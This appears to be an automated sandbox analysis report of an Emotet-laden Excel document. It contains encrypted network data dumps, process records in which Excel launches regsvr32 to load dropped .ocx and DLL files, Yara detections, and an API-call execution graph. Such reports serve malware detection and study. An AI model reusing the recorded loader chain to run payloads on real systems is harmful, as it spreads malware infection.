                                                                            2022-05-23 16:59:18 UTC1552INData Raw: 40 2a 0a 0b d1 9e 42 3e fc 68 a9 82 33 72 f1 77 6d 72 e4 fb 48 50 d5 b8 ad 14 14 57 a1 63 68 32 11 c6 92 07 3b b1 33 49 1f 33 20 65 36 e2 2d 76 66 b1 37 74 0e 7d 52 79 30 b4 12 14 3c 3f 39 ea 52 b3 1e 52 2f 68 ce 74 16 2a ef 5d 4f 52 bd 74 67 08 d5 25 4e 00 71 ca 13 a4 b5 26 18 fb 09 b3 08 d9 9f 14 1d 00 32 3a bf 36 cf d0 37 30 07 db 1a 45 0a 63 e2 f8 9d 78 e7 f6 69 18 1a 8d 92 ba 3b e6 93 49 bb 29 3e 7a c0 39 26 79 ca 23 46 36 22 d3 dc 13 dd b4 40 8a 59 43 52 3a f9 da 53 fd 4f 00 32 3b bd eb c0 16 12 78 c8 d4 7a d1 6a 50 30 f8 ac b9 20 16 19 c8 d6 56 da 76 77 6d 07 8b c3 fb 72 17 71 d9 b2 14 db 50 5e 61 23 d3 53 bb 56 b9 20 16 71 0a db 19 ca 9e a5 8e b0 ff 7a f9 33 24 cb 53 36 f7 c7 74 fe 61 6a 50 fd b0 5b 30 2c b7 99 36 3d b5 36 52 27 46 4c 5f 32 33 8f
                                                                            Data Ascii: @*B>h3rwmrHPWch2;3I3 e6-vf7t}Ry0<?9RR/ht*]ORtg%Nq&2:670Ecxi;I)>z9&y#F6"@YCR:SO2;xzjP0 VvwmrqP^a#SV qz3$S6tajP[0,6=6R'FL_23
                                                                            2022-05-23 16:59:18 UTC1568INData Raw: 02 fb 36 52 37 24 c2 88 1a 70 36 33 01 df 72 14 33 19 dd a1 62 18 b9 3f 72 08 ef bf e1 40 52 72 3a ff 33 49 7f 48 bb 2e 12 1b a1 13 3c 30 43 97 db a1 69 50 30 7b 81 47 64 b3 dc 83 51 72 72 bd ca 92 b0 b8 fd b9 14 0d c2 df f6 33 43 50 a9 80 41 9a e1 9a 55 fa a5 db 5f ca df b2 71 76 77 06 ca c0 31 72 36 7d c0 d7 f6 33 43 50 e6 c4 2b 4a 94 f2 e3 f0 67 32 59 a1 da 26 72 b1 f2 dd 4c 00 32 53 79 d0 49 d9 bb 80 40 50 5e 96 8b 7b fa a2 bf 33 ae 7a d2 90 93 9b 77 ff fa dd 4c 00 32 b3 93 83 4a 52 36 3e 28 d5 ee 62 6a 50 04 fa d3 80 67 32 59 c2 e7 c2 71 76 77 a1 07 04 f7 b5 b3 8b 4a 52 36 4e 0e 9d 5e a0 cf e8 33 73 56 38 e5 b7 e1 40 52 72 70 23 88 92 8e ad 8a 71 36 33 43 d3 83 88 40 50 5e 08 65 6d 30 37 dd bd dc 31 59 43 16 f9 f7 c6 74 6d 4f 8b bf b2 35 33 49 ba 48
                                                                            Data Ascii: 6R7$p63r3b?r@Rr:3IH.<0CiP0{GdQrr3CPAU_qvw1r6}3CP+Jg2Y&rL2SyI@P^{3zwL2JR6>(bjPg2YqvwJR6N^3sV8@Rrp#q63C@P^em071YCtmO53IH
                                                                            2022-05-23 16:59:18 UTC1584INData Raw: f2 e5 4f 00 32 d1 cc fe 49 39 b3 b8 43 50 5e 2c 26 dd 75 63 df b5 ec 32 59 43 d3 ff fa 76 77 6d cc 8f 5f 8c b7 86 c1 52 36 30 03 05 a3 9e ad d5 b0 73 56 30 28 bc 45 43 d9 ff f2 76 77 6d f7 9d b0 e5 65 c4 a8 93 dc 35 ca c5 de 61 6a 50 b1 c6 d6 30 64 32 bf 68 5d 72 f9 e3 f7 6d 4f 00 b9 ff be 33 49 52 de 43 31 50 5e da f9 08 36 73 bf a2 88 cd a6 84 d7 fa 72 76 77 aa 17 d1 32 f9 bb bb 49 52 36 88 06 70 89 25 9d b1 f1 99 53 b9 f1 ba 59 43 52 f3 c7 fe 77 6d 4f 3d c3 72 36 b8 cc da 36 30 43 b8 76 ef 6a 50 b5 b3 59 b4 66 3b 59 43 e9 be a4 7a 77 84 04 ec cd 8d f1 b6 c1 52 36 30 91 7e 05 61 ab fd b8 73 56 30 6f b3 ec cb 52 72 72 12 7c 6d 4f 8b b7 fa 36 33 49 13 bd ee ca 15 8e 88 75 bc cf 8c 91 b5 e4 32 59 43 82 58 a8 76 f6 e0 cf 00 32 72 b8 03 d6 97 b7 85 c3 50 5e
                                                                            Data Ascii: O2I9CP^,&uc2YCvwm_R60sV0(ECvwme5ajP0d2h]rmO3IRC1P^6srvw2IR6p%SYCRwmO=r660CvjPYf;YCzwR60~asV0oRrr|mO63Iu2YCXv2rP^
                                                                            2022-05-23 16:59:18 UTC1600INData Raw: 7f 15 bd 66 26 d9 7b 47 ab 6b ba 9e 95 a7 e8 68 96 15 82 19 a6 bc 57 a8 f6 7c 77 84 4d ff cd 8d f1 76 2e a3 18 fb 43 d1 1b 06 9d fa 30 73 d7 7d 03 6c 39 c7 cd f3 07 11 b9 99 86 9f b9 37 51 db 4d 9f c8 cf 84 15 49 8a 4a ab 30 f2 13 27 52 22 59 43 1a f9 aa b1 33 49 2f 10 32 72 36 b2 04 45 09 bf 83 46 12 ec 2d 60 b1 06 41 4a 5b c5 4f 84 17 0d 4b 31 79 6d ce 4d 4d 88 0b 09 a4 39 73 4f 04 d9 1b 1e eb 25 4f 12 89 6a a8 f5 1c 34 c2 bc 62 76 b6 08 38 07 b3 07 41 0e a6 44 08 5b 06 27 60 e8 2f 27 b1 06 21 b6 e6 b1 76 84 17 1d 64 57 e9 6d ce 4d 5d db 42 c4 5b d3 43 5f 5d 8e dc 2f eb 25 5f 5e 20 36 cf b3 2c 2c aa b5 06 81 b0 28 28 d6 ba 9a 36 b2 0c 35 b4 a9 43 50 9f 0c 0d 5b 5b 36 31 49 ed 77 3e c2 27 15 49 26 77 6d 88 45 29 b0 74 cf 49 93 53 2b 4b d1 2b 7a 38 b9 75
                                                                            Data Ascii: f&{GkhW|wMv.C0s}l97QMIJ0'R"YC3I/2r6EF-`AJ[OK1ymMM9sO%Oj4bv8AD['`/'!vdWmM]B[C_]/%_^ 6,,((65CP[[61Iw>'I&wmE)tIS+K+z8u
                                                                            2022-05-23 16:59:18 UTC1616INData Raw: 4a 52 39 bf 5c 57 5e 61 65 d4 2a 75 56 30 59 73 e1 43 52 7d f6 ad 73 6d 4f 3d 7e 4d 37 33 46 d6 8e 33 43 50 63 bc 12 51 30 7c d2 a1 66 32 59 7e f8 d5 73 76 78 e9 1e 01 32 72 0b c9 a8 50 36 3f c6 b4 54 61 6a 97 75 63 b5 3d 5e 32 d8 0e 42 b0 86 3a 94 e6 02 10 8a 37 16 e4 0d a5 d7 f1 a9 55 d7 34 7a d1 45 63 15 ee 85 33 9e 06 4a 86 15 00 77 ec 0a 18 69 4a c9 cc c8 17 2e d5 f4 af a1 e0 1f 48 f8 5e 10 8a e5 47 41 09 62 42 c8 fd 32 75 c4 45 22 9a 2e dd b7 ad f1 75 53 8a c7 68 6a 91 5d 63 5e b1 29 22 c8 76 bf 9b f3 33 67 09 e4 00 32 f3 43 23 47 6f d0 d9 84 15 46 8f fe 50 30 f8 1b 28 2c b9 81 fb 6b fc 91 4e 3b e6 84 f7 d3 ca 0f bd aa 6a e7 da ca 05 46 ea 27 48 c7 92 97 da 66 bb 0c 5b 93 17 6a 78 f6 18 57 96 39 4c 36 f4 0c 72 5a dd 03 50 df 24 4a ad e8 8c a9 b1 11
                                                                            Data Ascii: JR9\W^ae*uV0YsCR}smO=~M73F3CPcQ0|f2Y~svx2rP6?Tajuc=^2B:7U4zEc3JwiJ.H^GAbB2uE".uShj]c^)"v3g2C#GoFP0(,kN;jF'Hf[jxW9L6rZP$J
                                                                            2022-05-23 16:59:18 UTC1632INData Raw: cb 50 5e 61 82 83 b2 8c a9 78 ed 77 89 84 d7 fa 72 76 77 85 c6 fd 32 19 b3 bb 49 52 36 06 ca d5 d6 61 6a 50 88 70 cf 24 4b b3 dc cb 52 72 72 67 88 92 b0 c1 9f fa 36 33 49 5c b7 85 cb 50 5e 61 86 81 30 73 91 75 c0 3b c9 47 52 f9 3f d2 80 8c f7 6d f3 64 5a f2 a3 56 bf 65 e7 d1 2b c5 26 5d 30 73 91 75 e8 8b 3b d6 52 b3 17 fa 7c ec 3a 8c 47 26 27 98 8e 17 b6 6d 34 78 5e e0 2f d0 ef 1f a9 cf ef 7f d9 b4 b3 f9 b5 5d bd bc a6 03 f8 b3 df 36 c0 1f b6 b1 06 d0 62 e9 95 af b1 06 d6 2b eb 30 59 84 17 f6 b1 52 c7 6d c4 4d b6 85 d7 f2 a3 51 bf 65 c7 3b 1b e5 2f d9 75 f7 d7 45 e0 ae e8 98 53 b5 37 e6 3c 57 a8 00 7e f9 fd e2 24 c2 5d 75 d3 3b d7 24 fa d1 75 e3 38 38 9b cd d8 36 c2 8f 7b 27 47 aa 0a 94 2a 90 50 33 c8 17 a2 ee e6 50 5e e0 2f c4 ca bd a9 cf e5 47 cd 59 41
                                                                            Data Ascii: P^axwrvw2IR6ajPp$KRrrg63I\P^a0su;GR?mdZVe+&]0su;R|:G&'m4x^/]6b+0YRmMQe;/uES7<W~$]u;$u886{'G*P3P^/GYA
                                                                            2022-05-23 16:59:18 UTC1648INData Raw: 37 8a 31 73 ea d7 66 32 39 99 53 72 8e ad 76 6d 83 e7 30 72 ca e8 48 52 30 c9 42 50 be 86 68 50 38 8a 57 30 bb 30 5b 43 a6 95 70 76 97 6f 4d 00 f0 75 34 33 41 ba 34 30 87 57 5c 61 e8 58 32 73 8e d0 66 32 dd 4b 50 72 f2 7f 75 6d af e0 30 72 b6 3a 4b 52 02 3a 41 50 e2 80 68 50 04 79 54 30 13 3c 5b 43 72 9a 70 76 0f 63 4d 00 76 7d 34 33 71 ba 34 30 07 5f 5c 61 f4 42 32 73 62 d2 66 32 f9 51 50 72 f9 65 75 6d 4f e0 30 72 ba 20 4b 52 0c 24 41 50 e2 80 68 50 0c 67 54 30 d4 27 5b 43 ba 92 70 76 c7 78 4d 00 89 64 34 33 49 b2 34 30 a7 46 5c 61 3e 47 32 73 56 d1 66 32 0d 54 50 72 6e 6f 75 6d a7 e0 30 72 2a 2a 4b 52 4d 2f 41 50 16 89 68 50 4c 6c 54 30 3c 11 5b 43 0e 9a 70 76 2f 4e 4d 00 27 54 34 33 79 b2 34 30 5b 76 5c 61 b7 76 32 73 3a d8 66 32 b9 65 50 72 af 51 75
                                                                            Data Ascii: 71sf29Srvm0rHR0BPhP8W00[CpvoMu43A40W\aX2sf2KPrum0r:KR:APhPyT0<[CrpvcMv}43q40_\aB2sbf2QPreumO0r KR$APhPgT0'[CpvxMd43I40F\a>G2sVf2TPrnoum0r**KRM/APhPLlT0<[Cpv/NM'T43y40[v\av2s:f2ePrQu


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:18:58:21
                                                                            Start date:23/05/2022
                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                            Imagebase:0x13fb50000
                                                                            File size:28253536 bytes
                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:3
                                                                            Start time:18:58:32
                                                                            Start date:23/05/2022
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\cusoa1.ocx
                                                                            Imagebase:0xff610000
                                                                            File size:19456 bytes
                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.941525793.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:4
                                                                            Start time:18:58:33
                                                                            Start date:23/05/2022
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TURzt\TXqeznNbFanh.dll"
                                                                            Imagebase:0xff610000
                                                                            File size:19456 bytes
                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1247188737.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1246240752.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:5
                                                                            Start time:18:58:35
                                                                            Start date:23/05/2022
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\cusoa2.ocx
                                                                            Imagebase:0xff610000
                                                                            File size:19456 bytes
                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.948473026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.947931348.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:6
                                                                            Start time:18:58:38
                                                                            Start date:23/05/2022
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KIMRaXPqDerXJoZF\aRgQEkQ.dll"
                                                                            Imagebase:0xff610000
                                                                            File size:19456 bytes
                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1247080526.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1245946731.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:7
                                                                            Start time:18:58:41
                                                                            Start date:23/05/2022
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\cusoa3.ocx
                                                                            Imagebase:0xff610000
                                                                            File size:19456 bytes
                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.958523916.0000000000170000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.959190688.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:8
                                                                            Start time:18:58:43
                                                                            Start date:23/05/2022
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IyXmToN\lzIgCVr.dll"
                                                                            Imagebase:0xff610000
                                                                            File size:19456 bytes
                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1245962917.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1247115640.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:9
                                                                            Start time:18:58:46
                                                                            Start date:23/05/2022
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\cusoa4.ocx
                                                                            Imagebase:0xff610000
                                                                            File size:19456 bytes
                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.970233214.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.968294741.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:10
                                                                            Start time:18:58:47
                                                                            Start date:23/05/2022
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TlAadbHyBMqq\YRFxrLtktkh.dll"
                                                                            Imagebase:0xff610000
                                                                            File size:19456 bytes
                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1246205608.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1247066276.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:5.5%
                                                                              Dynamic/Decrypted Code Coverage:6.5%
                                                                              Signature Coverage:21.8%
                                                                              Total number of Nodes:353
                                                                              Total number of Limit Nodes:30
                                                                              execution_graph 38451 10007e90 38452 10007f49 RtlExitUserProcess 38451->38452 38454 10007eb2 38451->38454 38453 10007edd 38454->38452 38454->38453 38455 130000 38456 130183 38455->38456 38457 13043e VirtualAlloc 38456->38457 38460 130462 38457->38460 38458 130531 GetNativeSystemInfo 38459 13056d VirtualAlloc 38458->38459 38461 130a00 38458->38461 38462 13058b 38459->38462 38460->38458 38460->38461 38462->38461 38463 1309d9 VirtualProtect 38462->38463 38463->38462 38464 100393c0 38465 100393e9 38464->38465 38469 10039426 38465->38469 38471 100393f1 38465->38471 38476 10039160 38465->38476 38469->38471 38526 10002200 38469->38526 38470 10039468 38470->38471 38472 10039160 177 API calls 38470->38472 38472->38471 38473 10002200 85 API calls 38474 1003945b 38473->38474 38475 10039160 177 API calls 38474->38475 38475->38470 38477 100392d6 38476->38477 38478 10039175 GetProcessHeap HeapAlloc 38476->38478 38479 10039323 38477->38479 38488 100392da 38477->38488 38480 10039194 GetVersionExA 38478->38480 38481 100391bb 38478->38481 38482 10039398 38479->38482 38483 10039328 38479->38483 38484 100391c7 GetProcessHeap HeapFree 38480->38484 38485 100391a7 GetProcessHeap HeapFree 38480->38485 38481->38469 38482->38481 38653 1003d280 56 API calls 38482->38653 38639 1003d420 38483->38639 38486 10039208 38484->38486 38485->38481 38539 1003d610 HeapCreate 38486->38539 38488->38481 38648 1003d9f0 54 API calls _CreateFrameInfo 38488->38648 38491 1003923c 38491->38481 38542 1003d2e0 38491->38542 38494 1003930c 38649 1003ce60 57 API calls _CreateFrameInfo 38494->38649 38495 10039348 FlsSetValue 38498 10039384 38495->38498 38499 1003935b 38495->38499 38652 10039620 53 API calls sprintf_s 38498->38652 38651 1003ceb0 53 API calls 2 library calls 38499->38651 38500 1003925d 38504 100392c5 38500->38504 38511 10039266 GetCommandLineA 38500->38511 38501 10039311 38650 1003d670 HeapDestroy 38501->38650 38647 1003d670 HeapDestroy 38504->38647 38507 10039365 GetCurrentThreadId 38507->38469 38508 1003938c 38508->38469 38509 10039316 38509->38469 38510 100392ca 38510->38469 38562 1003df50 38511->38562 38513 10039278 38589 1003d6a0 GetStartupInfoA 38513->38589 38516 100392c0 38646 1003ce60 57 API calls _CreateFrameInfo 38516->38646 38519 1003928d 38520 100392a1 38519->38520 38614 1003da80 38519->38614 38525 100392a5 38520->38525 38645 1003d9f0 54 API calls _CreateFrameInfo 38520->38645 38523 10039296 38523->38520 38631 1003b490 38523->38631 38525->38469 38527 10002230 38526->38527 38528 10007d7e 38526->38528 38843 10038fb0 38527->38843 38851 10038d20 38528->38851 38531 10007cf4 CoLoadLibrary 38533 10007d18 38531->38533 38534 10007d0e ExitProcess 38531->38534 38532 10007e83 38532->38470 38532->38473 38535 10038fb0 __initmbctable 80 API calls 38533->38535 38536 10007d37 VirtualAlloc RtlAllocateHeap 38535->38536 38536->38528 38537 10007d65 shared_ptr 38536->38537 38538 10007d75 CoTaskMemFree 38537->38538 38538->38528 38540 1003d634 38539->38540 38541 1003d639 HeapSetInformation 38539->38541 38540->38491 38541->38491 38654 1003b6c0 38542->38654 38547 1003d2f4 FlsAlloc 38549 1003d376 38547->38549 38550 1003d30c 38547->38550 38548 1003d35b 38548->38549 38551 1003d366 FlsFree 38548->38551 38552 1003d391 38549->38552 38553 1003d381 TlsFree 38549->38553 38554 1003d420 _CreateFrameInfo 53 API calls 38550->38554 38551->38549 38666 10042900 55 API calls _CreateFrameInfo 38552->38666 38553->38552 38556 1003d31b 38554->38556 38556->38548 38558 1003d323 FlsSetValue 38556->38558 38557 1003d396 38557->38500 38558->38548 38559 1003d336 38558->38559 38665 1003ceb0 53 API calls 2 library calls 38559->38665 38561 1003d340 GetCurrentThreadId 38561->38500 38563 1003dfa1 38562->38563 38564 1003df6d GetEnvironmentStringsW 38562->38564 38565 1003dfb0 GetEnvironmentStringsW 38563->38565 38566 1003df92 38563->38566 38567 1003df87 GetLastError 38564->38567 38572 1003df7b 38564->38572 38568 1003e0f3 38565->38568 38565->38572 38566->38568 38569 1003e0a6 GetEnvironmentStrings 38566->38569 38567->38563 38567->38566 38568->38513 38569->38568 38571 1003e0b4 38569->38571 38570 1003dfe4 WideCharToMultiByte 38574 1003e023 38570->38574 38575 1003e090 FreeEnvironmentStringsW 38570->38575 38703 1003d3a0 53 API calls __initmbctable 38571->38703 38572->38570 38572->38572 38701 1003d3a0 53 API calls __initmbctable 38574->38701 38576 1003e072 38575->38576 38576->38513 38579 1003e02b 38579->38575 38581 1003e033 WideCharToMultiByte 38579->38581 38580 1003e0e2 38582 1003e0ea FreeEnvironmentStringsA 38580->38582 38583 1003e109 __initmbctable 38580->38583 38584 1003e066 FreeEnvironmentStringsW 38581->38584 38585 1003e05b 38581->38585 38582->38568 38587 1003e117 FreeEnvironmentStringsA 38583->38587 38584->38576 38702 10039620 53 API calls sprintf_s 38585->38702 38587->38513 38588 1003e063 38588->38584 38590 1003d420 _CreateFrameInfo 53 API calls 38589->38590 38597 1003d6df 38590->38597 38591 10039284 38591->38516 38602 1003de40 38591->38602 38592 1003d903 GetStdHandle 38599 1003d8b2 38592->38599 38593 1003d420 _CreateFrameInfo 53 API calls 38593->38597 38594 1003d97a SetHandleCount 38594->38591 38595 1003d81a 38595->38591 38598 1003d850 GetFileType 38595->38598 38595->38599 38600 10042eb0 _isindst 53 API calls 38595->38600 38596 1003d917 GetFileType 38596->38599 38597->38591 38597->38593 38597->38595 38597->38597 38597->38599 38598->38595 38599->38591 38599->38592 38599->38594 38599->38596 38601 10042eb0 _isindst 53 API calls 38599->38601 38600->38595 38601->38599 38603 1003de52 GetModuleFileNameA 38602->38603 38604 1003de4d 38602->38604 38606 1003de8e 38603->38606 38704 10047b70 95 API calls __initmbctable 38604->38704 38705 1003dc00 58 API calls 38606->38705 38608 1003df37 38608->38519 38609 1003deb7 38609->38608 38706 1003d3a0 53 API calls __initmbctable 38609->38706 38611 1003dee4 38611->38608 38707 1003dc00 58 API calls 38611->38707 38613 1003df0a 38613->38519 38615 1003da8d 38614->38615 38618 1003da92 38614->38618 38708 10047b70 95 API calls __initmbctable 38615->38708 38617 1003daa9 38617->38523 38618->38617 38619 1003d420 _CreateFrameInfo 53 API calls 38618->38619 38623 1003dafa 38619->38623 38620 1003db09 38620->38523 38621 1003dba2 38711 10039620 53 API calls sprintf_s 38621->38711 38623->38620 38623->38621 38624 1003d420 _CreateFrameInfo 53 API calls 38623->38624 38625 1003dbe5 38623->38625 38629 1003db81 38623->38629 38709 10047020 53 API calls sprintf_s 38623->38709 38624->38623 38712 10039620 53 API calls sprintf_s 38625->38712 38628 1003dbb1 38628->38523 38710 1003c6f0 6 API calls 2 library calls 38629->38710 38634 1003b4a5 38631->38634 38713 10042b20 38634->38713 38637 1003b533 38637->38520 38641 1003d450 38639->38641 38642 1003933c 38641->38642 38643 1003d46e Sleep 38641->38643 38829 1003b030 38641->38829 38642->38481 38642->38495 38643->38641 38644 1003d490 38643->38644 38644->38642 38645->38516 38646->38504 38647->38510 38648->38494 38649->38501 38650->38509 38651->38507 38652->38508 38653->38481 38667 1003cd90 38654->38667 38656 1003b6cb _initp_misc_winsig 38672 10040420 38656->38672 38661 10042850 38662 10042890 38661->38662 38664 1003d2f0 38662->38664 38680 10042eb0 38662->38680 38664->38547 38664->38548 38665->38561 38666->38557 38668 1003cdb3 GetModuleHandleA 38667->38668 38669 1003cd9f FlsGetValue 38667->38669 38670 1003cdaa 38668->38670 38671 1003cdc5 GetProcAddress 38668->38671 38669->38668 38669->38670 38670->38656 38671->38670 38673 1003cd20 _isindst 3 API calls 38672->38673 38674 1003b70e 38673->38674 38675 1003cd20 38674->38675 38676 1003cd34 FlsGetValue 38675->38676 38677 1003cd48 GetModuleHandleA 38675->38677 38676->38677 38679 1003b71a 38676->38679 38678 1003cd5a GetProcAddress 38677->38678 38677->38679 38678->38679 38679->38661 38694 1003cdf0 38680->38694 38684 10042ef1 38686 10042ef5 38684->38686 38687 10042f09 38684->38687 38685 10042f5b 38685->38662 38700 1003c6f0 6 API calls 2 library calls 38686->38700 38689 10042f10 38687->38689 38690 10042f19 GetModuleHandleA 38687->38690 38693 1003cd20 _isindst 3 API calls 38689->38693 38691 10042f43 38690->38691 38692 10042f2b GetProcAddress 38690->38692 38691->38689 38692->38689 38692->38691 38693->38685 38695 1003ce04 FlsGetValue 38694->38695 38696 1003ce18 GetModuleHandleA 38694->38696 38695->38696 38697 1003ce0f 38695->38697 38696->38697 38698 1003ce2a GetProcAddress 38696->38698 38697->38685 38699 1003b3f0 53 API calls sprintf_s 38697->38699 38698->38697 38699->38684 38700->38687 38701->38579 38702->38588 38703->38580 38704->38603 38705->38609 38706->38611 38707->38613 38708->38618 38709->38623 38710->38623 38711->38628 38712->38628 38714 10042b40 38713->38714 38715 1003cd20 _isindst 3 API calls 38714->38715 38716 1003b4c7 38714->38716 38715->38714 38716->38637 38717 10039140 38716->38717 38723 10039010 38717->38723 38719 10039149 38719->38637 38720 10053690 38719->38720 38745 1000aa80 38720->38745 38724 1003903a 38723->38724 38725 1003cdf0 sprintf_s 3 API calls 38724->38725 38726 10039047 38725->38726 38727 1003cdf0 sprintf_s 3 API calls 38726->38727 38728 10039056 38727->38728 38736 100390d3 38728->38736 38742 1003bd30 54 API calls sprintf_s 38728->38742 38730 1003907a 38731 100390ca 38730->38731 38732 100390a3 38730->38732 38733 10039096 38730->38733 38734 1003cd20 _isindst 3 API calls 38731->38734 38732->38736 38737 1003909e 38732->38737 38743 1003d4c0 57 API calls 38733->38743 38734->38736 38736->38719 38737->38732 38739 100390ba 38737->38739 38744 1003d4c0 57 API calls 38737->38744 38741 1003cd20 _isindst 3 API calls 38739->38741 38740 100390b5 38740->38736 38740->38739 38741->38731 38742->38730 38743->38737 38744->38740 38748 1000a57c 38745->38748 38757 10028c74 38748->38757 38751 1000a59d 38756 1000a5c4 38751->38756 38780 10028704 38751->38780 38758 10028c9f 38757->38758 38759 10028c9a 38757->38759 38761 10028ce9 EnterCriticalSection 38758->38761 38777 10028cd4 38758->38777 38810 1002885c TlsAlloc InitializeCriticalSection RaiseException Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38758->38810 38809 10016544 RaiseException Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38759->38809 38762 10028d01 38761->38762 38763 10028d39 LeaveCriticalSection 38761->38763 38762->38763 38767 10028d06 TlsGetValue 38762->38767 38765 10028d45 38763->38765 38768 